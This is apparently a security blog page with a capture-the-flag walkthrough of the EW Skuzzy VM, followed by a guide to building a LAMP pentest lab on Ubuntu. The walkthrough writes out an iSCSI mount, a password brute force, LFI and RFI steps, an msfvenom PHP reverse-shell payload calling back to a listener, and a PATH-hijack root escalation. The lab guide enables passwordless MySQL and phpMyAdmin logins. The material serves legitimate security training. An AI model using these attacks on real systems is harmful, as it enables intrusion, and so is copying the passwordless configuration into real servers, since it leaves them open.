Hack the EW Skuzzy VM (CTF Challenge)

Hello friends! Today we are going to take on another CTF challenge known as EW Skuzzy. The credit for making this VM goes to “vortexau”; it is another capture-the-flag machine in which the author has hidden flags for the attacker to find. You can download this VM here.
Let’s Breach!!!

The target holds 192.168.1.112 as its network IP; now let's use nmap to find the open ports.

nmap -sV 192.168.1.112


From the given image you can see that port 22 (SSH), port 80 (HTTP) and port 3260 (iSCSI) are open on the target.

We tried to connect to it over SSH but found no clue, so we opened the IP in a browser.

We spent some time on this site; after running dirb and nikto we found only some troll flags.
So we moved on to the next port, 3260, which runs iSCSI. iSCSI stands for Internet Small Computer Systems Interface; it is used to link data storage facilities over a network.

You can check which targets are available with the iscsiadm utility. Enter the following in a terminal:

iscsiadm -m discovery -t st -p 192.168.1.112

Then we log in to the discovered target to attach the data storage:

iscsiadm -m node --login


Now we check whether the storage is available:

fdisk -l


We see that one new disk, /dev/sdb, is available. Now we mount it to access its contents.

mount /dev/sdb /root/Desktop/raj


After mounting the storage device we move into the mount point and check its contents.


We find our 1st flag. We also find a disk image inside the storage, so we mount this image to check its contents.

Inside the disk image we find an email file “Toalice.eml” and an encrypted file “ToAlice.csv.enc”. We open the eml file and find our 2nd flag.
The eml file also tells us that the encrypted file is protected with 256-bit encryption.


When we try to decrypt the file it asks for a password, so first we brute-force the encrypted file to obtain the password:
bruteforce-salted-openssl -t 6 -f /usr/share/wordlists/rockyou.txt -d sha256 -c AES-256-CBC ToAlice.csv.enc


We now have the password “supercalifragilisticoespialdoso”. We use openssl to decrypt the file:
openssl enc -d -aes256 -md sha256 -salt -in ToAlice.csv.enc -out alive -k supercalifragilisticoespialdoso
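As an added illustration (not part of the original walkthrough), here is the key derivation behind the `openssl enc -aes256 -md sha256 -salt -k` command above and the brute-force tool that attacked it: with OpenSSL's legacy EVP_BytesToKey KDF each password guess costs only two SHA-256 calls, which is why a rockyou word falls so quickly, whereas the `-pbkdf2 -iter` mode multiplies that cost per guess. The salt and the sample file header are constructed; nothing real is decrypted.

```python
"""Key derivation behind `openssl enc -aes256 -md sha256 -salt -k <password>`.

Legacy OpenSSL (EVP_BytesToKey, count=1) stretches the password with a single
hash per guess; `openssl enc -pbkdf2 -iter N` uses PBKDF2-HMAC instead.
Added example, not code from the walkthrough; sample values are constructed.
"""
import hashlib

MAGIC = b"Salted__"  # 8-byte header openssl writes before the 8-byte random salt


def parse_salted_header(blob: bytes):
    """Split `openssl enc -salt` output into (salt, ciphertext)."""
    if len(blob) < 16 or blob[:8] != MAGIC:
        raise ValueError("not an OpenSSL 'Salted__' file")
    return blob[8:16], blob[16:]


def evp_bytes_to_key(password: bytes, salt: bytes, key_len=32, iv_len=16, md="sha256"):
    """Legacy KDF: D_1 = H(pw||salt), D_i = H(D_{i-1}||pw||salt), concatenated
    until key_len + iv_len bytes exist. For AES-256-CBC with SHA-256 that is
    exactly two hash calls per password guess: the whole cost of one attempt."""
    out, prev = b"", b""
    while len(out) < key_len + iv_len:
        prev = hashlib.new(md, prev + password + salt).digest()
        out += prev
    return out[:key_len], out[key_len:key_len + iv_len]


def pbkdf2_key_iv(password: bytes, salt: bytes, iterations=10000,
                  key_len=32, iv_len=16, md="sha256"):
    """Modern alternative (`openssl enc -pbkdf2 -iter <n>`, default 10000):
    one PBKDF2-HMAC call yields key||iv, costing `iterations` HMACs per guess."""
    dk = hashlib.pbkdf2_hmac(md, password, salt, iterations, key_len + iv_len)
    return dk[:key_len], dk[key_len:key_len + iv_len]


def hash_calls_per_guess(key_len=32, iv_len=16, md="sha256", iterations=None):
    """Approximate work factor a wordlist attack pays per candidate password."""
    if iterations is None:  # legacy EVP_BytesToKey: ceil((key+iv) / digest size)
        return -(-(key_len + iv_len) // hashlib.new(md).digest_size)
    return 2 * iterations   # PBKDF2: roughly two hash compressions per HMAC


if __name__ == "__main__":
    sample = MAGIC + bytes(range(8)) + b"<ciphertext>"  # constructed, not a real file
    salt, _ = parse_salted_header(sample)
    key, iv = evp_bytes_to_key(b"supercalifragilisticoespialdoso", salt)
    print("legacy key:", key.hex(), "iv:", iv.hex())
    print("hash calls per guess, legacy:", hash_calls_per_guess(),
          "pbkdf2:", hash_calls_per_guess(iterations=10000))
```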


We find the 3rd flag, along with some random-looking strings. At first we tried to decrypt them, but they were not encrypted at all; they turned out to be page names.
We open these in the browser. The first page contains nothing significant, just some trolling.


The second page contains some content that looks useful.


After playing around on the site we find our hint, so we move to the feed reader.


We open the load feed link.


Here we find a hint that a PHP file is hiding something, so we use dirb to find all the PHP files inside this folder:
dirb http://192.168.1.112/c2444910794e037ebd8aaf257178c90b/ -X .php



dirb lists all the PHP files in the folder. Opening them gives us another hint, and after looking at the URL we suspect that RFI may be possible on this site.


When we try RFI, the page says that an authentication key is required.


So we move to LFI: we read the PHP files through LFI using curl, with the php filter wrapper to get past the protection.


After scrolling down we find a base64-encoded string.


After decoding it we find the 4th flag.


Now we open the other PHP files. Going through them, we find the next hint in “reader.php”.
We read “reader.php” through LFI as well.


We again find a base64 string inside the file.


After decoding the string we find that it is PHP code. In the code we find our next hint: it states that the key is 47 characters long. Going back through my notes I found that flag4 was 47 characters long, so we used it as the key and it worked.


Now we create a payload using msfvenom and save it as a text file:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.120 lport=4444 > /root/Desktop/ra.txt


After creating the file we edit it and replace the PHP opening tag with ##php##.


Then we use RFI to include the shell on the server and get a meterpreter session, adding the key at the end of the URL.


We then start the listener in Metasploit:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.120
set lport 4444
exploit

Using RFI we execute the payload and get a shell:
meterpreter > sysinfo
meterpreter > shell
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
Then we look for setuid executables on the system:
find / -perm -4000 2>/dev/null


We find the file /opt/alicebackup; when we run it we see that it executes the id command by bare name, so the shell looks it up through PATH.
So we copy /bin/sh to a file named id in /tmp:
cp /bin/sh /tmp/id
and put /tmp at the front of PATH:
export PATH=/tmp:$PATH
then execute the file /opt/alicebackup again.


When we execute the file now, we get a root shell. With root we move into the /root/ folder and find the final flag.
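Added example (not from the walkthrough): the root cause of the /opt/alicebackup escalation is that a privileged program invokes `id` by bare name, so the shell's PATH search decides which binary runs. The block emulates that lookup with two constructed stand-in `id` scripts and shows the hardened pattern a privileged helper should use instead: call the program by absolute path under a fixed, trusted PATH. `TRUSTED_PATH` and the stand-in scripts are assumptions for the demo, which needs a POSIX /bin/sh.

```python
"""Why /opt/alicebackup was hijackable through PATH, and the hardened call pattern.
Added example, not code from the walkthrough; the two `id` stand-ins are constructed."""
import os
import shutil
import stat
import subprocess
import tempfile

# Fixed search path for privileged code instead of the caller's PATH (assumption).
TRUSTED_PATH = "/usr/sbin:/usr/bin:/sbin:/bin"


def resolve_like_system(cmd: str, path: str):
    """What `system("id")` ends up running: the first `id` found scanning PATH
    left to right. A user-writable directory placed first wins the lookup."""
    return shutil.which(cmd, path=path)


def run_hardened(program: str, *args: str) -> str:
    """Run a helper the safe way: absolute path only, and a scrubbed environment
    so neither PATH nor other inherited variables can redirect the call."""
    if not os.path.isabs(program):
        raise ValueError("refusing PATH lookup for %r; give an absolute path" % program)
    env = {"PATH": TRUSTED_PATH}
    out = subprocess.run([program, *args], env=env, capture_output=True,
                         text=True, check=True).stdout
    return out.strip()


def make_stand_in(directory: str, marker: str) -> str:
    """Constructed stand-in for an `id` binary; prints a marker showing which copy ran."""
    path = os.path.join(directory, "id")
    with open(path, "w") as f:
        f.write("#!/bin/sh\necho %s\n" % marker)
    os.chmod(path, stat.S_IRWXU)
    return path


def demo():
    """Returns (lookup_picked_the_writable_dir, output_of_hardened_call)."""
    with tempfile.TemporaryDirectory() as trusted, tempfile.TemporaryDirectory() as writable:
        real_id = make_stand_in(trusted, "real-id")
        make_stand_in(writable, "hijacked")
        picked = resolve_like_system("id", writable + os.pathsep + trusted)
        hijacked = os.path.dirname(picked) == writable
        return hijacked, run_hardened(real_id)


if __name__ == "__main__":
    print(demo())  # (True, 'real-id')
```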

Configure Penetration Testing Lab Setup in Ubuntu

Hello friends! Today you will learn how to configure your own web server using Ubuntu inside a virtual machine and install the LAMP services needed for a web server.
Let’s Begin!!
We are using VMware Workstation 12 Pro for the Ubuntu installation; follow the guidance step by step.

Choose Typical (the 1st option) for the configuration and click Next.

Since I have already downloaded the Ubuntu 14.04 64-bit image on my Windows system, browse to it as shown in the given image.
Click Next.


Now enter the information to personalize Linux in the text fields:
Full name: pentestlab
Username: raj
Password: 123
Confirm: 123
Then click Next.

Specify the disk capacity as you wish; I specified 20 GB.
Choose “Split virtual disk into multiple files” and then click Next.

Now make some changes to the settings through Customize Hardware before you click Finish.


Change the network adapter setting to Bridged and tick the check box “Replicate physical network connection state”.
Then click Close and then Finish.
This creates a new virtual machine inside VMware Workstation.

Now wait a short while until it boots automatically, after which the installation starts; this takes some time.

Now enter your password to log in.


Now we need to install the LAMP services, a collection of open-source software used to get web servers up and running. LAMP stands for Linux, Apache, MySQL, and PHP.
Installation requires root privileges, so type the following commands in a terminal to begin:
sudo bash
apt-get update


Apache HTTP Server is cross-platform software, built primarily for Unix-like systems, and it has played a key role in the growth of the World Wide Web.
apt-get install apache2

MySQL is the world's most popular open-source database; it is simple to set up and easy to use.

apt-get install mysql-server


You will get a prompt; press Enter to leave the password blank for the MySQL root user (this is for the isolated lab VM only).


Press Enter again to confirm.

phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the web. phpMyAdmin supports a wide range of operations on MySQL.

apt-get install phpmyadmin


Choose apache2 as the web server; it will be configured automatically to run phpMyAdmin.


Again a prompt opens asking for a password for phpMyAdmin to register with the database server.
Press Enter to leave the phpMyAdmin password blank.


Now, in order to configure phpMyAdmin under Apache, you need to add a line at the end of “/etc/apache2/apache2.conf”. Type the following commands to open apache2.conf:

cd /etc/apache2

gedit apache2.conf


Once the file is open, add the following text at the end of the file as shown in the given image:
# phpMyAdmin Configuration
Include /etc/phpmyadmin/apache.conf


After editing, save the file.

Since we gave a blank password for phpMyAdmin, we need to change its configuration file “config.inc.php” so that it allows logging in to the database with no password.
Type the following command to open config.inc.php:

gedit /etc/phpmyadmin/config.inc.php


Focus on the highlighted line and remove the double slash (//) in front of it, which comments it out.


Now you can see in the given image that the following line is highlighted and active:

$cfg['Servers'][$i]['AllowNoPassword'] = TRUE;


Now open phpMyAdmin in the browser at localhost/phpmyadmin as shown in the image.


Install the PHP 5 module for Apache 2 and all of its dependencies:
apt-get install php5 libapache2-mod-php5

We have now installed the LAMP services inside Ubuntu, so it can operate as a web server.


Now install some other useful services for sharing data between server and client.
Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network. It runs over TCP on port 22 to establish communication between server and client.
apt-get install openssh-server


Install the vsftpd service; it is the default FTP server in Ubuntu and also runs over TCP, listening on port 21.
apt-get install vsftpd


To ensure that the above services were installed properly, use nmap to scan your system; it reports the open ports and the services running on them.
To run nmap, first install it with the following command:
apt-get install nmap


Now scan your system with nmap to confirm the running services:
nmap 127.0.0.1
From the image below you can see that it has dumped the result, disclosing the running services on my system.